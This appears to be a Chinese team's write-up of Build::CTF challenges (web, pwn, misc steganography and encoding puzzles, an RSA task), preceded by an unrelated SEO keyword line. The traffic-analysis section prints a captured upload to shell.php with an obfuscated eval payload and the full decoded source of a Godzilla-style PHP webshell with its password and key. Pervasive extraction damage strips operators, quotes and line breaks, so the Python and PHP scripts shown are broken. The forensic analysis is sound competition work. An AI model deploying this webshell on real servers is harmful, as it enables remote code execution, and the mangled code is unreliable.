河南网站设计,网站建设微信端,wordpress用户关注,网页设计表单代码模板Build::CTF
flag不到啊战队--WP 萌新战队#xff0c;还请多多指教~ 目录
Build::CTF
flag不到啊战队--WP Web
ez!http
find-the-id
Pwn
我要成为沙威玛传奇
Misc
what is this?
一念愚即般若绝#xff0c;一念智即般若生
别真给我开盒了哥
四妹#xff0c;你听…Build::CTF
flag不到啊战队--WP 萌新战队还请多多指教~ 目录
Build::CTF
flag不到啊战队--WP Web
ez!http
find-the-id
Pwn
我要成为沙威玛传奇
Misc
what is this?
一念愚即般若绝一念智即般若生
别真给我开盒了哥
四妹你听我解释
如果再来一次还会选择我吗
白白的真好看
老色批
食不食油饼
四妹还是萍萍呢
EZ_ZIP
Guesscoin
HEX的秘密
我太喜欢亢金星君了
有黑客
BlackWhite Misc
FindYourWindows
Crypto
OVO开门爽开到南天门了兄弟 Web
ez!http find-the-id Pwn
我要成为沙威玛传奇 题目的附件这里小白白根本看不懂所以直接nc看一下是什么东西。
来吧直接nc连接 根据人家提示可以看出一口气吃100个沙威玛就可能得到flag
1--购买
2--吃
3--查看 金钱 或 沙威玛 数量。
4--小偷--2种情况1是被打扣钱2是金钱增加。
5--乞丐--2种情况扣钱/加一个沙威玛
---这里小白不断乱试就ok
发现 加钱的概率 和 加沙威玛的概率都是 有的。
---这里加钱会好点加一个沙威玛要好多次。
不断按4偷的米越来越多。 --》买 --》吃 最后发现/bin/sh
OK ,执行命令拿到flag Misc
what is this?
考點二進制轉換摩斯密碼 data.txt :
0110001101100011011000110010110001110000011100000111000001110000011100000010110001100011011000110111000001110000011000110111000000101100011100000010110001100011011000110110001101100011001011000110001101110000011100000111000001110000001011000110001101100011011000110010110001100011011000110111000001110000011000110111000000101100011000110111000001110000011100000111000000101100011000110110001101100011011000110110001100101100011000110110001101110000011100000110001101110000001011000111000001110000001011000111000001110000011100000111000001110000001011000110001101110000011000110010110001100011011000110110001101100011011000110010110001100011001011000110001101100011011100000111000001100011011100000010110001110000011000110111000001100011001011000111000001110000011100000111000001110000001011000111000001100011011000110010110001100011001011000110001101100011011100000111000001100011011100000010110001110000011000110111000001100011011100000111000000101100011100000110001101110000011000110111000001110000
二进制转
CyberChef ccc,ppppp,ccppcp,p,cccc,cpppp,ccc,ccppcp,cpppp,ccccc,ccppcp,pp,ppppp,cpc,ccccc,c,ccppcp,pcpc,ppppp,pcc,c,ccppcp,pcpcpp,pcpcpp
分析得到的数据一眼摩斯密码。
c .
p -
, 空格
在文本里全部替换。
... ----- ..--.- - .... .---- ... ..--.- .---- ..... ..--.- -- ----- .-. ..... . ..--.- -.-. ----- -.. . ..--.- -.-.-- -.-.--
解密--》 一念愚即般若绝一念智即般若生
考點解密 一个txt
一个加密的zip
txt
就 这 ¿ 就 这 ¿ 不 会 吧 不 会 吧 不 会 吧 就 这 ¿ 就 这 ¿ 不 会 吧 不 会 吧 就 这 ¿ 就 这 ¿ 就 这 ¿ 不 会 吧 不 会 吧 就 这 ¿ 就 这 ¿ 不 会 吧 就 这 ¿ 就 这 ¿ 就 这 ¿ 不 会 吧 不 会 吧 就 这 ¿ 不 会 吧 就 这 ¿ 不 会 吧 就 这 ¿ 就 这 ¿ 就 这 ¿ 就 这 ¿ 不 会 吧 不 会 吧 就 这 ¿ 不 会 吧 不 会 吧 就 这 ¿ 就 这 ¿ 就 这 ¿ 不 会 吧 不 会 吧 就 这 ¿ 就 这 ¿ 不 会 吧 就 这 ¿ 就 这 ¿ 就 这 ¿ 就 这 ¿ 不 会 吧 不 会 吧 就 这 ¿ 就 这 ¿ 不 会 吧 不 会 吧 不 会 吧 就 这 ¿ 就 这 ¿ 不 会 吧 就 这 ¿ 就 这 ¿ 就 这 ¿ 就 这 ¿ 就 这 ¿ 就 这 ¿ 就 这 ¿ 就 这 ¿ 就 这 ¿ 不 会 吧 就 这 ¿ 不 会 吧 就 这 ¿ 不 会 吧 就 这 ¿
直接随波逐流梭哈 --》阴阳怪气解密 得到压缩包密码。
解压---》
佛曰冥離是呐即俱耨薩那侄大姪訶怯多提勝涅冥咒孕大俱神闍侄老逝哆依真呐。罰呼帝冥耶梵大波得特輸至哆怖俱遠侄麼僧闍真栗恐三夷罰醯伊羯俱若夷皤槃得缽滅遠僧缽盡瑟寫俱舍梵夜心諳阿故哆上罰陀利罰得神侄帝呐無皤者俱曳哆耨怯夢伊道俱跋俱寫曳皤穆老顛離冥實奢怖多哆故悉怛隸呐阿諳一罰輸侄知侄者爍耨至怯尼諳呼俱槃諳夢缽集耨離缽。諳僧勝尼盡罰栗盧恐冥參多哆密苦怯栗即侄爍跋諳曳諳至俱提罰帝俱槃梵恐俱藝上蒙陀罰勝無菩數呐得俱所伽那醯侄藐藐侄以楞諳明奢姪南心皤倒侄夜遠故梵以楞皤世竟涅輸道奢倒冥穆罰得呐摩特沙瑟怯瑟皤怛皤槃缽呼俱耨諳朋南沙寫竟槃上缽故離波無悉缽漫孕羯侄瑟利知殿藐哆蘇道呐度知侄訶呐得諳婆明梵瑟舍缽謹奢竟俱數怯能怯羅究數哆夜帝羅
继续梭哈 --- 与x论禅 --》天书--》base 曰坤茫元量华劫始南灵梵冥炁渺荡净浩虚玉道坤玉终罗炁度清魄魔神龙融魂玉命魄鬼照色玉冥周色西鬼终命东融量照霄炁北南西生陀空茫陀周度清道茫炁冥度东真阎阎阿度命净威茫度元茫微威陀空人罗北魂威荡幽吉灵尊 别真给我开盒了哥 得出信息
北京 天津
S3901智能走一走说实话付费用户和普通差很多 单个试出。 四妹你听我解释 一张 png 图片点不开因为字节出错啦。
一看就是宽高问题
那咱们直接爆破宽高 得到正常的png
。。。
不错不错~
png是吧放到010 加载模板 发现 文件结尾后面还有字节
直接复制粘贴到一个新建好的hex文件中保存 --》 xxx.txt
拼接起来就是再去随波梭哈即可。核心价值观编码 如果再来一次还会选择我吗 png 看不了肯定有问题。
010 发现文件头IHDR 文件尾 字节的变化都有规律。
每4个字节一组前两位与后两位直接换。又要上脚本啦。。。别看我
def swap_every_four(hex_data):# 每4个字符为一组前两位和后两位互换swapped_hex .join([hex_data[i2:i4] hex_data[i:i2] for i in range(0, len(hex_data), 4)])return swapped_hexdef read_png_as_hex(file_path):with open(file_path, rb) as f:# 读取 PNG 文件的二进制数据png_data f.read()# 将二进制数据转换为十六进制表示hex_data png_data.hex()return hex_datadef save_swapped_hex_as_png(swapped_hex, output_path):# 将十六进制字符串转换回二进制数据swapped_binary bytes.fromhex(swapped_hex)with open(output_path, wb) as f:f.write(swapped_binary)if __name__ __main__:input_png 222.png # 输入 PNG 文件路径output_png outp222ut.png # 输出 PNG 文件路径# 读取 PNG 文件的十六进制数据hex_data read_png_as_hex(input_png)# 每4位字符2字节前后两两交换swapped_hex swap_every_four(hex_data)# 保存互换后的数据为新的 PNG 文件save_swapped_hex_as_png(swapped_hex, output_png)print(fSwapped PNG saved as {output_png})
ok又看到哥哥了。。。 得到key解压zip 条形码
在线阅读条形码 (aspose.app) 得到key
wo_bu_shi_xiao_hei_zi!!!
解压得到一大串 base 。。。这个长度看着都吓人到底是base什么呢 无限base64 直到解出为止。 CyberChef 白白的真好看 0000000.txt 来了零宽度
Unicode Steganography with Zero-Width Characters (mzy0.com) 拿到第二段flag。
white.docx:
显示隐藏的文字即可 拿到第一段flag
snow.txt:
看文件名就很清晰了snow隐写需要个key在哪回复公众号 snow解密 得到第三段flag
-----共3段flag 老色批 一张png 都提示这么明显了LSB QnVpbGRD VEZ7MV9h
bV9uMHRf TFNCISEh
fQ
base64 --- 》
CyberChef 食不食油饼 你这不是空格制表符等等是什么
看了一顿也不知道那就只能梭哈啦 。---》文本盲水印果然真的盲。
base64 解压zip 这个jpg hex LSB 都看了还没有思路。
想起前面的盲水印再来个图片盲水印问题应该不大吧。 单图盲水印 ---果然 gg真油
解压zip
base32 --》 四妹还是萍萍呢 二维码拼接
图片拼接-在线拼图-在线PS-在线图片编辑-图片合并-在线工具 (qtool.net) ok 得到 二维码 ---扫码发现是一个公众号
公众号一般就是回复东西回复什么呢看了hex也没发现什么有用信息。
看 四妹.png 010 一开 png模板一加载就发现有报错 咱们直接定位到那里去看看怎么回事
明显是个文件头缺失的zip里面还一个 公众号回复password有惊喜.txt
--复制出来添加文件头得到zip --公众号回复得到 key
St7wg.
解压得到其文件 base走一波 ---是png哎导出得到图片 010看或根据经验就是宽高有问题导致图片失真了。
梭哈一下得flag EZ_ZIP --解压后拿到一张jpg图片(二維碼 010发现zip文件头, 直接复制出来 另存为---》xxx.zip
脚本直接解压---》
import os
import zipfiledef unzip_all(zip_file_path, extract_dir):# 打开并解压 zip 文件with zipfile.ZipFile(zip_file_path, r) as zip_ref:zip_ref.extractall(extract_dir)# 删除已解压的 zip 文件os.remove(zip_file_path)def find_zip_files(directory):# 遍历目录找到所有 zip 文件zip_files []for root, dirs, files in os.walk(directory):for file in files:if file.endswith(.zip):zip_files.append(os.path.join(root, file))return zip_filesdef recursive_unzip(start_dir):while True:# 查找当前目录中的所有 zip 文件zip_files find_zip_files(start_dir)if not zip_files:# 如果没有找到 zip 文件则退出循环print(解压完成没有更多的 ZIP 文件。)break# 对找到的每个 zip 文件进行解压for zip_file in zip_files:print(f正在解压: {zip_file})unzip_all(zip_file, os.path.dirname(zip_file))if __name__ __main__:# 设置要解压的起始目录start_directory C:\\Users\\Anonymous\\Desktop\\12recursive_unzip(start_directory) 得到flaggggggg.zip 伪加密直接改
解压--》得flag Guesscoin ---经过反复调试就全0就绕过了 HEX的秘密 给c2f5e9ece4c3d4c6fbb3c5fafadfc1b5e3a1a1dfe2e9eee1f2f9f9f9fd
hex xor 80 } 我太喜欢亢金星君了 給了一個gif圖。閃的有規律。
就这么闪思考了一会儿就是 摩斯了 男 -
女 .
白 空格
我单个弄的...)
-... ..- .. .-.. -.. -.-. - ..-. ----.-- .-- ....- .---- -.-. --- -- ....- ..--.- -. ....- .-- ..--.- ..-. .---- ... .... -----.- 有黑客
考點流量分析哥斯拉流量特征 12多万条数据
http.request.methodPOST
通过过滤发现hacker主要通过上传干的事情。 分析 追踪流看看就看这个吧
POST /uploads/shell.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Cookie: PHPSESSIDe30bpdvj90mp4gcgo3ukjcoa3t;
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Host: 192.168.155.22
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 1413hackereval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7ciMmVDMjVDZ4AjMxYzNiNzNn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7ciclt2YhhGaoh2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3BhhhhackerLOk%2FNjEyMDhkNSj%2BeJf7%2B3gH5VBRUhj2NOUuZmUsfGZjsBh9HeAfF0virBj8q%2BMYHqr%2BeX0b5m%2FW%2B0pmZ1aAZACuehv4%2Bn%2FJL%2FkuVddg2HueKnpA%2F%2F39dah%2BYjCIqf6FYmI3Ng%3D%3DHTTP/1.1 200 OK
Host: 192.168.155.22
Date: Tue, 08 Oct 2024 08:57:26 GMT
Connection: close
X-Powered-By: PHP/8.2.23
Set-Cookie: PHPSESSIDe30bpdvj90mp4gcgo3ukjcoa3t; path/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charsetUTF-87ba0e8f6b3da4a83LOk/NjEyMDhkNkjfav75hiqH9YzMocx4BtpMDVm1f2ed56a3adc98dc
解码 ok让我们看看原先的数据是什么呢 --原先的數據一定是php代碼。
K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7ciMmVDMjVDZ4AjMxYzNiNzNn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7ciclt2YhhGaoh2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD
import urllib.parse
import base64s K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7ciMmVDMjVDZ4AjMxYzNiNzNn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7ciclt2YhhGaoh2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQDs_urlen urllib.parse.unquote(s)s_urlen_1 s_urlen[::-1]s_urlen_1_b64 base64.b64decode(s_urlen_1)print(s_urlen_1_b64)
b\r\nsession_start();\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nfunction encode($D,$K){\r\n for($i0;$istrlen($D);$i) {\r\n $c $K[$i115];\r\n $D[$i] $D[$i]^$c;\r\n }\r\n return $D;\r\n}\r\n$pass\hhhhacker\;\r\n$payloadName\payload\;\r\n$key\73b761208d5c05f2\;\r\nif (isset($_POST[$pass])){\r\n $dataencode(base64_decode($_POST[$pass]),$key);\r\n if (isset($_SESSION[$payloadName])){\r\n $payloadencode($_SESSION[$payloadName],$key);\r\n if (strpos($payload,getBasicsInfo)false){\r\n $payloadencode($payload,$key);\r\n }\r\n\t\teval($payload);\r\n echo substr(md5($pass.$key),0,16);\r\n echo base64_encode(encode(run($data),$key));\r\n echo substr(md5($pass.$key),16);\r\n }else{\r\n if (strpos($data,getBasicsInfo)!false){\r\n $_SESSION[$payloadName]encode($data,$key);\r\n }\r\n }\r\n}\r\n
ok 明显是 哥斯拉的流量特征
通过搜索构造脚本
?php
$key17ba0e8f6b3da4a83LOk/NjEyMDhkNtCBGq4a12ErNDRqF5fqqKn31KfS2Mf/wOPUPfWS1Bz2gcgHsZD9S7WdbBQcSwNKNdj0kcACNzNi1f2ed56a3adc98dc;
//直接使用encode方法
function encode($D,$K){for($i0;$istrlen($D);$i) {$c $K[$i115];$D[$i] $D[$i]^$c;}return $D;
}$key73b761208d5c05f2;
$strsubstr($key1, 16);
echo $str;
echo PHP_EOL;
$str2substr($str,0,-16);
echo $str2;
echo PHP_EOL;
$str3gzdecode(encode(base64_decode($str2),$key));
//gzdecode(encode(base64_decode($key1),$key))
echo $str3;
?
post 请求 提交 找一下 key1
7ba0e8f6b3da4a83LOk/NjEyMDhkNtCBGq4a12ErNDRqF5fqqKn31KfS2Mf/wOPUPfWS1Bz2gcgHsZD9S7WdbBQcSwNKNdj0kcACNzNi1f2ed56a3adc98dc
运行poc得flag BlackWhite 解压之后文件夹里是黑色和白色的 jpg 文件猜想可能是二维 打开 Excel批量把图片插入到单元格中 想凑成二维码正好 1089 是 33 的平方所以设置成一行插入 33 张图片 然后输出单元格为图片 得出二维码进行扫描发现扫描出 “3I8XEDHUCJTARQFOEDX7D08AC80T8N08Y6948DF2C43C9B6Z2”
再用 Base45 解密得出 BuildCTF{Tich1?pAnDa?_HahA_U_w1n} Misc
FindYourWindows
考点内存磁盘取证数据恢复
提示我的桌面好像有点不对劲了
下载题目解压之后
啥文件类型也不知道啊。懵懵的啥考点也不像那就是是取证方向了。
给了一个文件还有一个key那是什么呢
搜索发现其实是一个磁盘key
用veraCrypt软件加载到磁盘上面为磁盘位置和加载的密钥文件key
下面为磁盘文件--findyourwindows 加载好之后用DiskGenius软件打开查找即可不行就右键恢复 Crypto
OVO开门爽开到南天门了兄弟 題目
from Crypto.Util.number import *flag bBuildCTF{******}#随机生成p,q
p getPrime(1024)
q getPrime(1024)#计算模数n
n p*qe 65537m bytes_to_long(flag)#cm^e%n
c pow(m, e, n)print(P ,p**2)
print(Q ,q**2)
print(n ,n)
print(e ,e)
print(c ,c)# P 8279853330757234669136483032750824826175777927506575083710166412897012079466955769715275604152872242147320194640165649152928984919315754419447729793483984130396358578571137956571302516202649076619076831997922675572705848199504309232044502957866317011212505985284129365522570368395368427388904223782742850616983130885152785650513046301920305069822348366931825404271695876688539675285303882189060671184911139742554710018755565518014777733322795522710234091353878298486498244829638878949389690384488573338138825642381687749888102341379254137445546306796258092762099409409285871651688611387507673794784257901946892698481
# Q 9406643503176766688113904226702477322706664731714272632525763533395380298320140341860043591350428258361089106233876240175767826293976534568274153276542755524620138714767338820334748140365080856474253334033236457092764244994983837914955286808153784628739327217539701134939748313123071347697827279169952810727995681780717719971161661561936180553161888359929479143712061627854343656949334882218260141557768868222151468471946884225370009706900640851492798538458384449294042930831359723799893581568677433868531699360789800449077751798535497117004059734670912829358793175346866262442550715622833013235677926312075950550681
# n 8825283482190476005946253343638820879559355306860912268128891241513310054066424567824202757539757712177309282694997613217968336164050770152277369601415394249781577415456224120102543968285035647514461364611734338073523454354376992783551035395558194171202680855182868766563277697325690226849316944101739491659812174054898519492145495098671439125714086449826697343692081109131564556220174583970363431110462222473013021825770267803249515893736989430146194199936335153936611196467225599746830873958085287665223190767137404366840055297859554490123389877396965710177279558954630222879974581602069901175074777191362537419581
# e 65537
# c 27915082942179758159664000908789091022294710566838766903802097394437507062054409033932303966820096232375646873480427485844733381298467171069985418237873120984132166343258345389477844339261488318588760125230979340678006871754125487279212120945061845738130108370814509280317816067243605608952074687396728904772649873860508240809541545939219624254878900291126739390967820141036260712208555574522131446556595562330969209665291757386246648060990840787769772160549862538116370905306402293764494501838709895355570646716245976733542014165663539815972755562821443411642647981898636761822107221203966296758350547477576411216744594534002057673625678188824476543288048956124565509473100550838563085585434675727358831610724920550213350035792170323729397796947598697983084347567191009236345815968927729025919066227704728180060805553787151862426034275526605154807840695498644070184681962311639338273469859838505348823417234722270798882384367058630064108155240680307754557472476430983184039474907188578578484589833812196216551783354411797156409948499012005963943728564803898150155735762695825658678475746559900705796814512838380193603178657226033406812810314960142251012223576984115642351463684724512456778548853002653596485899854303126091917273560
脚本
from Crypto.Util.number import *
from math import isqrt# 给定的 P, Q, n, e, c
P 8279853330757234669136483032750824826175777927506575083710166412897012079466955769715275604152872242147320194640165649152928984919315754419447729793483984130396358578571137956571302516202649076619076831997922675572705848199504309232044502957866317011212505985284129365522570368395368427388904223782742850616983130885152785650513046301920305069822348366931825404271695876688539675285303882189060671184911139742554710018755565518014777733322795522710234091353878298486498244829638878949389690384488573338138825642381687749888102341379254137445546306796258092762099409409285871651688611387507673794784257901946892698481
Q 9406643503176766688113904226702477322706664731714272632525763533395380298320140341860043591350428258361089106233876240175767826293976534568274153276542755524620138714767338820334748140365080856474253334033236457092764244994983837914955286808153784628739327217539701134939748313123071347697827279169952810727995681780717719971161661561936180553161888359929479143712061627854343656949334882218260141557768868222151468471946884225370009706900640851492798538458384449294042930831359723799893581568677433868531699360789800449077751798535497117004059734670912829358793175346866262442550715622833013235677926312075950550681
n 8825283482190476005946253343638820879559355306860912268128891241513310054066424567824202757539757712177309282694997613217968336164050770152277369601415394249781577415456224120102543968285035647514461364611734338073523454354376992783551035395558194171202680855182868766563277697325690226849316944101739491659812174054898519492145495098671439125714086449826697343692081109131564556220174583970363431110462222473013021825770267803249515893736989430146194199936335153936611196467225599746830873958085287665223190767137404366840055297859554490123389877396965710177279558954630222879974581602069901175074777191362537419581
e 65537
c 27915082942179758159664000908789091022294710566838766903802097394437507062054409033932303966820096232375646873480427485844733381298467171069985418237873120984132166343258345389477844339261488318588760125230979340678006871754125487279212120945061845738130108370814509280317816067243605608952074687396728904772649873860508240809541545939219624254878900291126739390967820141036260712208555574522131446556595562330969209665291757386246648060990840787769772160549862538116370905306402293764494501838709895355570646716245976733542014165663539815972755562821443411642647981898636761822107221203966296758350547477576411216744594534002057673625678188824476543288048956124565509473100550838563085585434675727358831610724920550213350035792170323729397796947598697983084347567191009236345815968927729025919066227704728180060805553787151862426034275526605154807840695498644070184681962311639338273469859838505348823417234722270798882384367058630064108155240680307754557472476430983184039474907188578578484589833812196216551783354411797156409948499012005963943728564803898150155735762695825658678475746559900705796814512838380193603178657226033406812810314960142251012223576984115642351463684724512456778548853002653596485899854303126091917273560# 通过对 P 和 Q 开平方得到 p 和 q
p isqrt(P)
q isqrt(Q)# 计算欧拉函数 φ(n)
phi_n (p - 1) * (q - 1)# 计算私钥 d
d inverse(e, phi_n)# 解密密文 c
m pow(c, d, n)# 将解密得到的长整型转换回字节并输出
flag long_to_bytes(m)
print(Flag:, flag.decode())